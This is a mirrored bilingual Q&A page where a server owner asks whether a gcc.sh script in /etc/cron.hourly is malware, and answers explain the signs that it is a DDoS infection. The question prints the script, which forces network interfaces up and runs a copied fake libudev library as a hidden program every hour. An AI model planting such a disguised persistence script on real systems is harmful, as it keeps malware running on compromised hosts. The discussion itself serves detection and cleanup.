这个文件(gcc.sh)是否在cron.hourly恶意软件中?
[英]Is this file (gcc.sh) in cron.hourly malware?
问题描述
I have been experiencing spikes up to 1 Gbps on my server and have been looking for virus' and malware. 
我的服务器上遇到了高达1 Gbps的峰值,并且一直在寻找病毒和恶意软件。 I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. 我在/etc/cron.hourly中找到了这个文件:gcc.sh,并且想知道是否有人看过类似的东西,并且会对代码有所了解。 Thanks! 谢谢!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
2 个解决方案
解决方案1
10 已采纳 2016-04-14 12:49:50
Quite likely. 很有可能。 It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. 它使用/lib/libudev.so.6作为可执行文件,而名称暗示它应该是一个库 - 尝试使用像nm或objdump这样的工具来查看它是否是可执行文件。 It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. 它从/lib/libudev.so复制到.so.6 - 而.so通常是版本化符号的符号链接。 It also runs a for loop to bring up all network connections even if you've turned them off. 它还运行for循环以显示所有网络连接,即使您已将其关闭。 It uses the name of a well-known compiler to look legit. 它使用着名的编译器的名称来看起来合法。 I'd call this 99%+ likely a virus. 我称之为99%+可能是病毒。
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . 找到另一个自称为gcc的内容 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver 。 And yes, that's a DDoS virus on a unix system, exactly matching your problem. 是的,这是unix系统上的DDoS病毒,与您的问题完全匹配。
解决方案2
0 2016-04-14 12:56:18
yes it is. 是的。
try using ps -ef | 尝试使用ps -ef | grep -i libudev.so.6 to see the processes used by the program grep -i libudev.so.6查看程序使用的进程
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.